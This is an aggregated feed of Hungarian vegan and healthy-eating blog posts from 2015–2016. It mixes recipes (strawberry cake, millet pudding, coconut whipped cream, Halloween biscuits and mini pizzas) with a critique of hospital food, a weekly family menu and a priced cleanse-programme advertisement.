2016. június 4. Éltető ételek 

Epres torta újratöltveA napokban már készítettem egy epres tortát, pontosabban a nagylányom szülinapjára. Ez a mostani is hasonló, de mégsem. A tésztája most egy piskóta, a csokikrém egy főzött puding, a tetejére viszont ugyanaz az eperzselé került. A friss eprek ugyanakkor nem a tortára kerültek, hanem a szélét raktam ki vele. Igazán mutatós lett, és nagyon jól megtartotta a krémet. Hozzávalók: Tésztája: - vegán piskóta. A tésztába magozott cseresznyét szórtam. Csokikrém: Puding, kukoricakeményítő nélkül, egészségesen. Az alap pudingot megfőztem, majd levettem a tűzről. Tettem bele 1 evőkanál cukormentes kakaóport, és fél tábla 70%-os étcsokit. Ezenkívül szórtam hozzá 4 evőkanál chiamagot. De legközelebb inkább 1 mokkáskanálnyi agar-agart főzök bele. Így is szeletelhető volt, de masszívabb az állaga agar-agarral. Eperzselé: - 50 dkg eper - 2 teáskanál agar-agar - késhegynyi vaníliapor A megmosott epret botmixerezd össze, és tedd fel főni. Folyamatos keverés mellett szórd bele az agar-agart. 1-2 perces lassú főzés után hagyd langyosra hűlni. Így állítsd össze - A kihűlt piskótára tedd vissza a sütőforma keretét. - A megmosott, félbevágott epreket tedd körbe a formán. - Simítsd bele a pudingot. - 1-2 óra elteltével pedig tedd rá az eperzselét.Hagyd a hűtőben néhány órára. Itt szerzem be az alapanyagokat: - Agar-agar - Chiamag

Gyümölcsös kölespuding

2016. május 9. Éltető ételek 

Gyümölcsös kölespudingGyakran készítek a gyerekeimnek különböző desszerteket, amelyeket akár pudingnak is nevezhetünk. De ezek minden esetben valamilyen gabona alapúak, most éppen a kölesre esett a választásom. Szerencsére már megszokták ezeket az ízeket, állagokat... bár, nincs is más választásuk. :) Az agar-agar igazán jó állagot adott neki, olyan zselés lett, mintha valóban pudingot ettek volna. De mi is ez a furcsa nevű alapanyag? Ez egy természetes növényi zselésítő, a zselatin vegán változata. Tengeri vörösalgából készül. Kerülhet lekvárokba, dzsemekbe, gyümölcskocsonyába vagy éppen növényi joghurtba. Gumicukor és tortazselé is készülhet belőle. Ha színezni szeretnénk a zselét, eleve színes gyümölcslével keverjük ki, vagy a víz egy részét helyettesítsük pl. cukormentes szörppel. Hideg folyadékban kell feloldani, majd 2-3 percig forralni. Az agar-agar forrón híg, csak 40 fok körül sűrűsödik be. A zselésedési folyamat mindig megfordítható, bármikor felmelegíthető, újra szilárdítható. És most jöjjön a recept: Hozzávalók (4 adag): - 15 dkg köles - 7 dl rizstej - 1 dl meggylé - 1/­­2 rúd vanília - csipet himalája só - 2 evőkanál méz vagy kókuszcukor/­­juharszirup - 2 evőkanál aga-agar - kedvenc gyümölcsünk (nekem most erdei gyümölcs volt a fagyasztóban) Elkészítése: - A kölest jó alaposan mossuk át bő vízben.Egy száraz serpenyőben pirítsuk addig, hogy megszáradjanak a szemek. Érezni fogjuk az illatot, ami kimegy belőle.Öntsük fel a tejjel, tegyük bele a kikapart vaníliát a rudat is, és a sót.Kb. 15 perc alatt kellően megpuhulnak a szemek.Egy kevés vízben oldjuk fel az agar-agart, majd keverjük a kásához. 1-2 rottyantás elég neki.Vegyük le a tűzről, tegyük bele a mézet. Nekem éppen volt kioolvasztva meggy, így ennek a levét is beleöntöttem. Tegyük formába, és hagyjuk megdermedni.Gyümölcszselével vagy friss gyümölcspürével kínáljuk.

Mit eszik a vega beteg/páciens a kórházban?

2016. április 14. Zizi kalandjai 

Mit eszik a vega beteg/páciens a kórházban? Reggeli: kifli, Ráma margarin, egy szelet sajt Mit eszik a vega beteg vagy az én esetemben a kismama, ugyanis nem betegként voltam kórházban, hanem a szülés miatt… igen rendhagyó és kalandos szülés miatt. Na semmi baj nem volt, inkább viccesnek mondanám, olyan sztorinak, amit még az unokáinknak is mesélni fogunk. Szóval három óra alatt (!!!) lezajlott az enyhe fájdalmaktól kezdve a szülésig Ákos ezen világra érkezése, majd a kórházban kellett töltenünk 72 órát… jó hosszú 72 órát, már alig vártuk, hogy kiszabaduljunk. Ezen idő alatt volt időm szemrevételezni és lefotózni (bocsánat a képek minősége miatt, telefonnal, elég rossz megvilágításban készültek) az ételek zömét, amit felszolgáltak vegetáriánus fogásokként… node a húst fogyasztók sem voltak szerencsésebbek nálam, vagyis ők sem úgy távoztak az asztaltól, hogy ez volt életük legfinomabb Michelin csillagos fogása. Ebéd: alap “zöldségleves”, rizs répával és reszelt sajttal, cseresznye befőtt Nem tudom, hogy kik állítják össze az étrendet, de tápértékileg szinte egyenlő a nullával. Azt meg tudom érteni vagy el tudom fogadni, hogy kevés pénzből kell kihozniuk sokat, de azt nem tudom elfogadni, hogy évtizedek óta nem változtatnak például a tökfőzelék receptjén, azaz nem agyoncukrozottan és agyonecetezetten kellene főzniük, hanem hagymával és sóval, no meg némi kaporral (nem hiszem, hogy a hagyma többe kerül, mint az ecet és a cukor!). Biztos vagyok benne, hogy a gyerekek többsége – többek között én is ilyen voltam – azért utálja a tökfőzeléket, mert a menzákon cukrosan és ecetesen készítik. Aztán egyszer meg mertem kóstolni anyukám tökfőzelékét és elkezdtem szeretni… rájöttem, hogy ez nagyon finom (és rendszeresen főzöm is nyáron). Miért nem lehet változtatni a közétkeztetésben a begyepesedett cukros, ecetes tökfőzelék recepten még hosszú évek után sem? Oknyomozó fotóriporterként néhány dolgot megkóstoltam (kiskanálnyi mennyiség) a kórházban, csak, hogy ne írjak olyanról, amit nem is tapasztaltam meg. Vegán étrend nem is kérhető (az ételek ettől függetlenül vegán volt), vegetáriánus, laktóz- és talán gluténmentes, valamint diétás (ez mit takart, nem tudom) létezik (legalábbis, ahol voltam). A reggelik elég egyhangúak: kifli vagy zsemle margarinnal, cukros vagy cukormentes tejeskávé vagy tea, néha egy szelet sajt. Az ebéd mindig levessel indul, valamilyen főfogás és befőtt vagy desszert (túró rudi) követi. Vacsorára szinte semmit sem hoztak, lepakoltak néhány zacskó kiflit vagy zsemlét, amihez a szokásos margarint adták. Szóval ezeket adják kismamáknak, éppen szoptatást kezdő anyukáknak vegetáriánus ételként 2016-ban Magyarországon egy kórházban (de gondolom a többiben is hasonlót). A 72 óra alatt nem kaptam egyetlen egyszer sem valamilyen nyers zöldséget vagy gyümölcsöt… jó, persze január volt – nem friss zöldségekben, gyümölcsökben gazdag szezon -, de azért egy almát vagy körtét vagy egy szál sárgarépát adhattak volna. A változatosság gyönyörködtet… újabb reggeli: zsemle margarinnal (kés, tányér, szalvéta otthonról) Ebéd: alap “zöldségleves”, az a bizonyos borzasztóan cukros ecetes tökfőzelék burgonyakrokettel és túró rudi Szerencse, hogy a család ellátott tápláló ételekkel – gyümölcsökkel, teljeskiörlésű pékáruval, magokkal, napi egyszeri főtt étellel –  és nem kellett éheznem. Persze elgondolkoztam azon, hogy hogyan lehetne változtatni a rendszeren, a felszolgált ételeken. Továbbképzés, receptek megváltoztatása minden bizonnyal segítene, az ízetlen ételeket igenis lehet ízessé tenni egy kis kreativitással még akkor is, ha kevés pénz áll rendelkezésre. Szokásos reggeli… a mandarint nem a kórház adta, a család hozta be nekem! Ebéd: felismerhetetlen ízű és drapp színű teljesen üres leves, krumplis tészta savanyú uborkával, almakompót Szerintetek min kellene változtatni? Ti hogyan reformálnátok meg a kórházi étkeztetést? Még többet a témáról: Kórházi koszt – Facebook oldal Zöld Ella – Vegánként túlélni a kórházat Milyen a hazai kórházi koszt?

A tökéletes vegán, tejmentes körözött receptje kölesből

2016. április 7. VegaNinja 

Ha szereted a körözöttet (melynek neve a körkörös, keverő mozdulatokból ered eszerint az oldal szerint), akkor ki kell próbálnod az egészséges, köleses verzióját! Elkészítése egyszerű, és minden hozzávalója egészséges, laktózmentes, gluténmentes és persze cukormentes. Hozzávalók: 250 g köles 1 közepes fej hagyma apróra vágva só, bors, kömény, pirospaprika 1 evőkanál mustár 3-4 evőkanál rizstejszín (szója-, zab- és mandulatejszínnel is működik) 2-3 evőkanál kókuszolaj kókuszecet ízlés szerint (kihagyható, vagy citromlével helyettesíthető) A kölest kétszeres mennyiségű sós vízben puhára főzzük, összekeverjük a többi összetevővel. A tetejére szórt petrezselyemmel, metélőhagymával díszítve tálaljuk. The post A tökéletes vegán, tejmentes körözött receptje kölesből appeared first on VegaNinja.

Tavaszi Megújuló Program

2016. március 10. Fittanyuka 

Kedves Résztvevő! Gratulálok döntésedhez, az egészséghez vezető út egyik legfontosabb lépése a megfelelő, ,,tiszta táplálkozás. Olyan ételek fogyasztása amelyek segítik szervezeted megtisztulását, miközben feltöltik létfontosságú tápanyagokkal! A Program lehetőséget nyújt, hogy te magad döntsd el, az élethelyzetednek megfelelően, hogy hány hetes étrendreformálást vállalsz! Minimum egy hét ajánlott, maximum  három hónap! Igazából akkor a legsikeresebb a Program, ha tulajdonképpen nem fejezzük be, hanem  maradunk az életmód váltásnál, csak néhány tápanyaggal bővítjük az étrendünk a későbbiekben. Ha mégis ,,kúraként tekintjük, ebben az esetben is érezni fogjuk jótékony hatását amely nemcsak a közérzetünkön javít, hanem centiméterekben és ruhaméretünk csökkenésén is mérhető lesz! Az alábbi árak tartalmazzák az egész napi étrendet a választott mennyiségű héten keresztül, egy másfél órás konzultációt egyénre szabottan, kőrtöltésen belül a kiszállítást, csomagolást és az Áfát! A napi étrend a következőket tartalmazza: - Reggeli - Tízórai (zöld turmix vagy gyümölcs turmix): 5 dl - Ebéd - Uzsonna: (Fehérje Turmix: Laktóz, glutén,-cukormentes): 3 dl - Saláta vacsora   1 hetes Program /­­hétfőtől - vasárnapig/­­: 28.900.- ft. + 4500.-ft. 24 napi búzafűlé (kúra-csomag) Választható! 2 hetes Program: 56.800.-+4500.-ft.24 napi búzafűlé (kúra-csomag) 3 hetes Program: 83.700.-+4500.-ft. 24 napi búzafűlé (kúra - csomag) 4 hetes Program: 110.000.- +4500.-ft. 24 napi búzafűlé (kúra - csomag)   A Tavaszi Megújító Program Március 16.-tól Május 31.-ig elérhető!    

Vegán cukormentes csokoládés rizspuding

2016. február 1. Zizi kalandjai 

Vegán cukormentes csokoládés rizspuding Kedves vagyok, ugye? Most indult a cukormentes február és máris egy desszerttel jövök! A jó hírem, hogy szinte édesítés mentes a pohárdesszert, szóval, aki egy kis “édességet” megenged magának februárban, az is kipróbálhatja! Úgy volt, hogy ez a recept, lehet, hogy bekerül egy ausztrál cukormentes csokoládés édességek szakácskönyvbe, de aztán a lustaságomnak köszönhetően nem küldtem el a receptet, így megmaradt nekem. A felhívás az volt, hogy cukormentes csokoládés édességet készítsünk, melyhez megadták, hogy mikkel lehet édesíteni a desszerteket. Ez egy nagyon egyszerű recept, a hagyományos tejberizsre épül, azt változtattam meg és adtam hozzá néhány extrát. A csokoládékrém alapját pedig kesudió adja. A rizspudingot egyáltalán nem édesítettem, ugyanis az édeskés rizstej (amely csak rizst, vizet és tengeri sót tartalmaz, tehát nem édesített!) pont elég neki. A csokoládékrémbe pedig nagyon kevés rizsszirup került. Szóval ez enyhén édes desszert, amelyhez jól passzol a keserű csokoládékrém. Szerintem jól sikerült, érdemes kipróbálni! Vegán cukormentes csokoládékrémes rizspuding Hozzávalók: Rizspudinghoz: – 1/­­2 bögre jázmin rizs – 2 bögre rizstej – 1 vaníliarúd kikapart magjai – csipet Himalaya só Csokoládékrémhez: – 1 bögre kesudió, egy éjszakára, de minimum 3-4 órára beáztatva – 1/­­3 bögre kakaópor vagy karobpor – 1/­­3 bögre rizsszirup – 1/­­4 bögre víz – 1 vaníliarúd kikapart magjai – csipet só (A recepthez használt bögre 250 ml-es.) Egy lábasba feltesszük főni a rizst a rizstejjel, közben hozzáadjuk a sót és a vaníliát. Néha megkeverve addig főzzük, amíg a rizs meg nem puhul. Ha nagyon sűrűvé összeáll a puding, hígítsuk egy kevés rizstejjel. Hagyjuk langyosra hűlni, amíg elkészítjük a krémet. Szűrjük le a beáztatott kesudiót, majd tegyük robotgépbe (késes aprítógépbe). Adjuk hozzá a kakaót, a rizsszirupot, vaníliát, csipet sót és a vizet. Járassuk a robotgépet addig, amíg teljesen sűrű, sima krémet kapunk. Kanalazzuk a rizspudingot poharakba (vagy üvegekbe) és kanalazzunk a tetejükre a csokoládékrémből. Úgy a legjobb, ha hagyjuk hűtőben állni kb. fél órát.

Tejszínhab tej nélkül? Lehetséges!

2015. december 18. Gréta konyhája 

Tejszínhab tej nélkül? Lehetséges!Ha tej, azt mondom kókusztej, mandulatej, mogyorótej, rizstej, máktej... Ha tejföl, joghurt, akkor azt mondom szójatejföl, szójajoghurt, kókuszjoghurt, magtejfölök... A sajtokat is könnyedén elkészíthetjük otthon, vagy széles választékban megvásárolhatjuk bioboltokban, akár a Trappistát, Füstöltet, Cheddart, Mozzarellát, és most már Parmezánt is.  Ha tejszín, akkor szójatejszín, rizstejszín, mandulatejszín... De a nagy kérdés, hogyan tudunk megszokott textúrájú, mégis egészséges, növényi, tejszín ízű habot készíteni a különböző sütikhez, krémeket. Tapasztalatom azt mutatja, hogy először mindenki a nagyáruházakban kapható, és növényi tejszín jelzővel illetett termékekhez nyúl, amelyek cukrozatlan változata még jó is lenne számunkra, ha az összetevők címszó alatt, nem látnánk felsorolva a tejfehérjét, és nem pálmazsírból és hidrogénezett növényi zsírokból készülnének, amelyek egészség-és környezetkárosító hatásúak.  Így más alternatívák után kell nézni az arra allergiásoknak, és a vegánoknak is.  Elkezdtem kísérletezni a főzőtejszínekkel, de nem jártam sikerrel.  Egy külföldi blogon olvastam a kókusztejszínhabról, ami leírva nagyon egyszerűnek tűnt, és jóval olcsóbbnak, mint a fentebb említett alternatívák. Vegyünk egy magas zsírtartalmú sűrű nagy kókusztartalommal rendelkező konzerv kókusztejet és egy éjszakra tegyük hűtőbe. Csak közvetlenül akkor vegyük ki a hűtőből, ha felverjük.  Egy tálba fölözzük le a sűrű krémes a doboz tetején ülő kókuszkrémet,. (a vízszerű maradékot a dobozban hagyjuk, és mondjuk a legközelebbi turmixunkba tudjuk tenni ) Hozzáadjuk a nádporcukrot, vagy stévia port(ízlés szerint) és gépi habverővel felverjük.  A másik verzió, ha habszifont használunk, ez esetben a sűrű kókusztejszín a legmegfelelőbb, amit pici kókusztejjel hígíthatunk, teszünk hozzá egy teáskanál útifűmaghéjat , elkeverjük, majd mehet a szifonba. Tehetünk bele stévia port, vanília aromát. Jól összerázzuk. Minden legyen hűtőhideg.!!! Az ebből készült édességeket érdemes hűtőben tartani, mert előfordulhat, hogy szobahőmérsékleten elkezd olvadni, még mielőtt felszolgálnánk.

Jótékonysági sütivásár avagy adományért cserébe sütemény jár

2015. december 10. Éltető ételek 

Jótékonysági sütivásár avagy adományért cserébe sütemény járEgyre gyakrabban hallani, hogy kisebb-nagyobb városok, városokban működő alapítványok, egyesületek adományt gyűjtenek nemes cél érdekében. Nos, ez nálunk sincs másképp... Tiszaújváros Gyermekeinek Egészségéért van most sok konyhában sürgés-forgás. Nálam sem volt ez másképp... délelőtt muffint sütöttem - természetesen két adagot, hogy a gyermekeimnek is maradjon estére :) -, és mindenmentes, nyers karácsonyi süteményt. Akinek nincs lehetősége megkóstolni, akkor közkinccsé teszem a receptet, hogy bárki el tudja készíteni magának (és családjának). Hozzávalók: Aszaltszilvás sütemény - 10 dkg datolya - 10 dkg aszalt szilva - 10 dkg kesudió - 3 dkg kókuszreszelék - 1-2 ek. kókuszliszt - 5-6 csepp narancsolaj - késhegynyi vaníliapor - csipet só Kakaós-áfonyás sütemény - 10 dkg datolya - 10 dkg áztatott/­­szárított dió - 1 marék aszalt, cukormentes áfonya - 2 teáskanál cukrozatlan kakaópor - 2 evőkanál puffasztott quinoa - 2 evőkanál kókuszreszelék - 1-2 evőkanál kókuszliszt - 4 csepp narancsolaj - késhegynyi vaníliapor - csipet só Elkészítése: Az aszalványokat az olajos magokkal daráljuk krémesre. Ha szükséges, pici mandarinlevet önthetünk hozzá.A többi hozzávalót is adjuk hozzá, gyúrjuk össze,A nyújtódeszkát szórjuk meg kevéske kókuszliszttel, majd nyújtsuk ki rajta a tésztát úgy, hogy folpackot teszünk rá.Szaggassuk ki, majd 1-2 óra alatt szárítsuk ki (pl. aszalóba, sütőbe, radiátoron, kandallón).

Gluténmentes, laktózmentes, cukormentes vaníliás keksz

2015. december 3. Élj harmóniában 

Gluténmentes, laktózmentes, cukormentes vaníliás kekszMúlt héten egy kedves jógás tanulómnak megígértem, hogy karácsonyig jó néhány keksz és rágcsálnivaló finomság receptjét teszem közzé a blogon - ezt lehet is látni a korábbi bejegyzésekből:). Ennek megfelelően ma  is készítettem egy gluténmentes, tejtermékmentes kekszet. Hozzávalók: - 20 dkg rizsliszt - 10 dkg csicseriborsóliszt - 10 dkg datolyacukor (vagy kókuszcukor) - 1/­­2 csésze kókuszzsír -  1/­­2 csésze víz (vagy használhatsz valamilyen növényi tejet is) - 1/­­4 teáskanál szódabikarbóna - 1/­­2 teáskanál sütőpor - csipet só - vanília Keverd össze először a száraz hozzávalókat, add hozzá a kókuszzsírt és a vizet. Gyúrd össze jól addig, amíg egy jól formálható lágy tésztát nem kapsz. A tésztát nyújtsd ki - picit töredezhet, de nagyon jól lehet vele dolgozni. Majd sütikiszúró formával készítsd el a kekszeket. A kekszeket tedd sütőpapírral bélelt tepsire. 180 fokra előmelegített sütőben süsd készre a kekszeket. (. kb. 15 perc) Vegyszermentes (bio) alapanyagokat használj!

Mit eszik a vegagyerek? (teljes heti menü)

2015. november 25. Zizi kalandjai 

Mit eszik a vegagyerek? (teljes heti menü)   Többen kértetek tőlem heti menüt, hogy írjam le teljesen mit eszik a vegagyerek és családja. Múlt héten fényképezőgépet ragadtam és igyekeztem nagyon sok ételt lefotózni. Többnyire reggeliket és ebédeket fotóztam, mert a vacsorákat már sötétben fogyasztjuk és nem szeretek lámpa mellett fotózni (csak természetes fénynél). Természetesen a leírásban az összes étel szerepel: reggelitől tízórain, ebéden és uzsonnán át a vacsoráig. Remélem segítségetekre lesz és inspirációul szolgál sok mindenkinek. Az esetek 98%-ban vegán (minden állati eredetű élelmiszertől mentes) ételeket eszünk és 2%-ban előfordul tojás vagy tejtermék (vaj, sajt formájában) az étrendünkben. Szóval az étrendünket vegán helyett inkább növényi alapú táplálkozásnak hívnám (angolul plantbased-nek nevezik), amelyben a zöldség, a gyümölcs és a gabona játssza a fő szerepet. Azt gondolom, hogy a táplálkozásnak harmónián kell alapulnia és nem görcsölésen, ezért engedem meg magunknak, hogy ha megkívánunk mást is (tojásra és tejtermékre gondolok), akkor azt meg is esszük. Így lesz kiegyensúlyozott a táplálkozás… szerintem. No persze arra is figyelek, hogy mit mivel párosítok (komplettálás), hogy az ételeink teljesértékű fehérjét (gabona + hüvelyesek párosítása), vitaminokat, ásványi anyagokat tartalmazzanak. A komplettálás nem feltétlenül jelenik meg minden ételünkben, de az biztos, hogy hetente többször előfordul. Ádi nagy zöldség fogyasztó, mindent megeszik nyersen, főzve és sütve is. Igazából minden ízlik neki, eddig még ételt nem utasított vissza vagy köpött ki. Azt gondolom, ez nagyon szerencsés helyzet, de hiszem, hogy az általunk, szülők által adott és adandó alapok, valamint példamutatás ehhez a sikerhez nagy mértékben hozzájárulnak. Lássuk, mit is ettünk egy héten keresztül (minden étel vegán)… HÉTFŐ Reggeli: kendermagporral dúsított zabkása sütőtök lekvárral, kakaóbabtörettel és hántolt kendermaggal megszórva. Tízórai: kesudió. Ebéd: pásztor pite (ez maradék volt előző napról), frissen készített salátával. Uzsonna: alma, perec ropi (úton voltunk, közben majszoltuk). Vacsora: humusz, vegán “felvágott”, avokádó, brokkoli csíra, savanyú káposzta, Pipacs Pékség rozskenyér. KEDD Reggeli: körte, kesudió. Tízórai: zöldségek nyersen (Ádi szavajárásával: “mindenből egy picit eszünk…”) ebédkészítés közben. Ebéd: karfiol leves, palacsinta házi cukormentes lekvárokkal. Uzsonna: sült gesztenye, sült sütőtök, alma. Vacsora: humusz, avokádó, uborka, brokkoli csíra, kevés paradicsom, Pipacs Pékség alakor kenyér. SZERDA Reggeli: ugyanolyan zabkása, mint hétfőn. Tízórai: narancs, később zöldségek ebédkészítés közben. Ebéd: falafel fasírt, kuszkusz és párolt zöldségek (padlizsán, répa, burgonya, vöröshagyma, fokhagyma). Uzsonna: kivi, alma, paradió, kesudió. Vacsora: hagymapástétom, répa és zellerszár szeletek, teljeskiörlésű zsemle. CSÜTÖRTÖK Reggeli: acai smoothie. Tízórai: alma, kivi. Ebéd: villámgyors ebédet kellett készíteni, mert délelőtt ringatón voltunk, így készült paradicsomos tészta és hozzá ettünk előző napi maradékot, falafelt és párolt zöldségeket. Uzsonna: narancs, banán. Vacsora: avokádó, vegán sajt, uborka, brokkoli és vöröshagyma csíra, szezámkrém Pipacs Pékség tönkölykenyérrel. PÉNTEK Reggeli: banános zab palacsinta (ehhez nagyon hasonló) kevés juharsziruppal meglocsolva, kivi. Tízórai: alma. Ebéd: marinált sült tempeh (imádjuk!), pirított citromos leveleskel, rizs és citromos tahini szósz. Uzsonna: narancs, alma. Vacsora: zöldségfasírt (IKEA változat), sült krumpli, saláta, avokádó. SZOMBAT Reggeli: zabkása hántolt kendermaggal megszórva. Tízórai: alma, kelkáposzta levél (biopiacon rágcsálva). Ebéd: pénteki maradék + burgonyás pogácsa. Ezen a napon többnyire piacozunk, így vagy maradékot eszünk ebédre, vagy mindenfélét (kenyeret, pékárut, zöldségeket, gyümölcsöket) és inkább este főzök. Vacsora: zöldséges szárazbableves sajtos mustáros pirítóssal. VASÁRNAP Reggeli: mandulavajas házi cukromentes szilvalekváros pirítós. Tízórai: alma, kesudió. Ebéd: maradék szárazbableves, zöldséges tortellini. Gyerekprogramoztunk délelőtt, így villámgyorsan kellett összedobnom valamit ebédre… így esett a választás a DM-ben is kapható zöldséges tortellinire – néha tartok itthon ilyeneket vészhelyzetek elkerülésére. Uzsonna: banán. Vacsora: avokádó, brokkoli csíra, savanyú káposzta, gabonakolbász, Pipacs Pékség tönkölykenyér. És egy kis ráadás, amit az előző hetekben ettünk… Citromos vöröslencse krémleves, pirított fűszeres szejtán és tepsiben sült édesburgonya Pirított kelbimbós “tejszínes” (rizstejszín) bulgur (olyan rizottó féleség ) Pirított fokhagymás, szójaszószos tofu, pirított citromos leveleskel, rizs

6 "rémisztő" recept a boszorkánykonyhámból nem csak Halloweenra

2015. november 2. Zöld Avocado 

6 A hétvégém a Halloween jegyében telt, és ezt szeretném megosztani veletek! Ti szerettek vidáman ünnepelni és jókat enni? Én nagyon! ;-)  halloweeni sütőtökös keksz  A Halloweenról Magyarországon eléggé megoszlanak a vélemények. Sokan úgy gondolják, hogy morbid és a gyerekek számára ártalmas szokás, melyet a Világ számos országában egyre szélesebb körben ünnepelnek. Sokszor tévesen összekeverik a Mindenszentekkel, és nem értik, hogy miért ünnepelnek vidáman az emberek, amikor az elhunyt szeretteinkről kéne megemlékeznünk?! A két ünnep nem egy és ugyanaz! Mindenszentek napját november 01-én tartanak Magyarországon, míg a Halloween-t október 31-én ünnepel a Világ.  Halloween napján rémisztő jelmezekbe bújnak kicsik és nagyok, kidekorálják kívül - belül az otthonokat, az üzleteket, az utcákat, a gyerekek "Csokit vagy csínyt" felkiálltásokkal járják a házakat, és gyűjtik a különböző apró édességeket. Sokak szerint ez csak egy újabb kapitalista, vásárlás és eladás központú népbutítás, ami csak a pénzről szól. Van ebben az elméletben is valami... de én máshogy látom.  Szerintem ... a Halloween egy újabb nap, amikor a családtagok és a barátok egy közös cél érdekében összefognak, díszítenek, jelmezeket készítenek, sütnek, főznek, ünnepelnek, együtt kilátogatnak és megnézik a település által szervezett jelmezes felvonulást, tűzijátékot. Egy újabb nap, egy újabb alkalom, amikor én a közösségi szellemet, a szeretetet, és az élni akarást érzékelem. Azok az emberek, családok, baráti társaságok, akik ilyenkor jelmezbe bújnak, elfeljtkeznek egy pár órára a mindennapi szerepeiktől, feladataikról, problémáikról. Egy kicsit újra gyerek lesz mindenki, és újra a játékról, a szórakozásról, az élni akarásról szól mindent. Nekem ezt jelenti a Halloween! :-) Egy társasági esemény, egy közösségi élmény, telis tele mókával és kacagással! :-) halloweeni csokis pók muffin  Ezekben a napokban jól keresnek-e a kereskedők? Ez nem kétség! De nem csak erről szól a Halloween, mint ahogyan a karácsony sem csak az ajándékokról szól, és a vásárlásról!  Miért rémisztő és ijesztő jelmezekkel kell ünnepelni a Halloweent? Ennek is egyszerű oka van! A tradíció miatt. A hagyomány szerint az elmúlt évben meghaltak lelkei október 31-éről november 01-ére virradó éjszakán vándorolnak a holtak birodalmába. Az ijesztő dekorációk, jelmezek, a világító töklámpások pedig elősegítik, hogy a holtak szellemei ne maradjanak a Földön kísérteni, megijedjenek, és távozzanak a holtak birodalmába mindörökre.   Zöld Avocado boszorkánykonyha Az ijesztő és rémisztő hangulat rosszat tesz-e a gyerekeknek? Nem hinném! Én mosolyt és vidámságot látok az arcukon, bármilyen országban is járok, és élem át a Halloween ünnepét! Én azt látom, hogy örülnek, mert apa-anya együtt szorgoskodik a gyerek jelmezén, a ház dekorálásán, kísérgetik őket házról házra, amíg édességet gyűjtenek, együtt faragják a töklámpásokat, sütögetik a speciális halloweeni ételeket. Én egy családi programot látok, mely szeretetben és harmóniában tellik el! Még nem láttam kisgyermeket sírni, vagy megrémülni a jelmezek láttán. Még nem tapasztaltam ennek az ünnepnek az árny oldalát, amiről az ünnep ellenzői néha beszélnek. Ez nem azt jelenti, hogy nem létezik árny oldala, de én eddig még csak a jó oldalát láttam, és az általa létrehozott szeretetet! :-)  Így hát, amikor csak tehetem, én is nagy szeretettel veszek részt egy-egy halloweeni mulatságon, játékos baráti összejövetelen, sürgök-forgok a konyhában, és készítem az alkalomhoz illő, de reform édességeket, ételeket. Most is készült néhány recept a Zöld Avocado vegetáriánus gasztroblog boszorkánykonyhában, amit nagyon szívesen megosztok veletek. Még jól jöhet a következő Halloween party-ra, vagy a rémisztő kiegészítők nélkül, hagyományos, egész évben az asztalra tehető ételeket készíthetünk belőlük. Fogadjátok sok szeretettel őket! ;-)    halloweeni sütőtökös keksz (laktózmentes, tojásmentes, vegán) HALLOWEENI SÜTŐTÖKÖS KEKSZ HOZZÁVALÓK (kb. 30 db-hoz) - 400 g sütőtök püré (párolt vagy sült sütőtök húsa kikaparva) - 300 g teljeskiőrlésű tönköly búza liszt - 1 ek őrölt fahéj, 1 tk őrölt szerecsendió, 1 kk őrölt szegfűszeg - 1 tk szódabikarbóna - 1/­­2 tk Himalája só - 120 g tetszés szerinti édesítőszer (pl.: barna nádcukor, nyírfacukor, eritrit stb.) - 2 ek őrölt lenmag + 6 ek víz (azaz 2 vegán tojás) - 200 ml repce olaj vagy olívaolaj -  - csokikrém a dekorációhoz: 50 g olvasztott ét csokoládé és 1 ek kókuszolaj ELKÉSZÍTÉS A természetes tojáshelyettesítőhöz a frissen darált lenmagot elkeverjük a vízben, majd hagyjuk egy 15 percet állni, kocsonyásodni. Ezután mehet bele a tésztába. A hozzávalókat összekeverjük, majd tetszés szerinti formában a sütőpapírra helyezem. Én ezesetben egy nagyobb pogácsa szaggatót használtam. A tészta zsíros, nem lehet kinyújtani és kiszaggatni. Egy evőkanál segítségével megtöltöttem a pogácsa szaggatót, amit a sütőpapírra helyeztem. Majd felemeltem a szaggaótt, odébb helyeztem, kanállal újra töltöttem... és így tovább. A végén csodaszép szabályos, és kerek kekszeket kapunk. Mivel most szerettem volna, hogy töklámpás formája legyen, ezért kézzel kicsit rásegítettem a szép kerek formákra. De ha nincs Halloween, hagyjuk őket szabályos kekszként, és süssük meg őket kb. 10 perc alatt, 180 ° C fokos sütőben.     Kihűlés után, nagyon finom, és puha kekszeket majszolhatunk még napok múlva is.  Megjegyzés: A sütőtök édes ízétől függően változtathatunk a hozzáadott édesítőszer mennyiségének. Az általam használt mennyiség, édes sütőtök püréhez lett megadva. halloweeni mini pizza oliva pókokkal (gluténmentes, tojásmentes) HALLOWEENI MINI PIZZA HOZZÁVALÓK (kb. 40 db mini pizzához) - kemény sajt - fekete olíva bogyó pizza tésztához: - 350 g gluténmentes kenyérliszt - csipet Himalája só, 1 tk őrölt oreganó - 2 dl langyos víz - 1/­­2 tk szódabikarbóna - csipet Himalája só - 2 ek extra szűz olívaolaj - 1 ek őrölt lenmag (elhagyható) paradicsomszószhoz: - 200 ml paradicsom püré (cukormentes) - 1 marék friss bazsalikom - Himalája só, őrölt fekete bors, csipet őrölt chili fűszer - 3 gerezd fokhagyma ELKÉSZÍTÉS A pizza tésztához valókat összegyúrjuk, majd félretesszük meleg helyre pihenni 1 órát. A kissé megkelt tésztát ketté választjuk, majd lisztezett deszkán kinyújtjuk. Kör alakú szaggatóval kiszaggatjuk a mini pizzákat, és sütőpapíron előmelegített sütőbe tesszük őket. 180 °C fokon 5 perc alatt elősütjük a kis pizza lapokat, majd kivesszük hűlni. Ezt elvégezzük a másik fél nyers tésztával is. Közben elkészítjük a szószt. A paradicsompürét egy edénybe feltesszük a tűzhelyre forrni. Beleszórjuk az apróra vágott fokhagymát, a fűszereket, és egy marék friss bazsalikom levelet apróra vágva. Közepes lángon 5 percig főzzük, folytonos kevergetés mellett, majd félretesszük a tűzhelyről. Az elősütött mini pizza lapokat vastagon megkenjük a paradicsomszósszal, majd rátesszük a kemény sajtból szaggatóval szaggatott sajt karikákat. Az olíva pókokhoz előre feldaraboljuk a fekete olíva bogyókat. Szükség lesz a póktesthez félbe vágott olíva bogyóra, a lábakhoz, olíva bogyó csíkokra, és a fejhez apróra vágott olíva bogyóra. Ez egy jó kis türelemjáték. Egyesével összeállítani a pókokat a pizza lapocskán. Érdemes segítséget venni magunk mellé, és akár a gyerekeket bevonni, ha nem szeretnénk órákat állni a konyhában. Miután elkészültünk velük, mehet vissza az előmelegített sütőbe, és 180 °C fokon kb. 10-15 perc alatt készre sütjük a mini pizzákat. Tökéletes vendégváró falatka, mert szobahőmérsékleten is nagyon 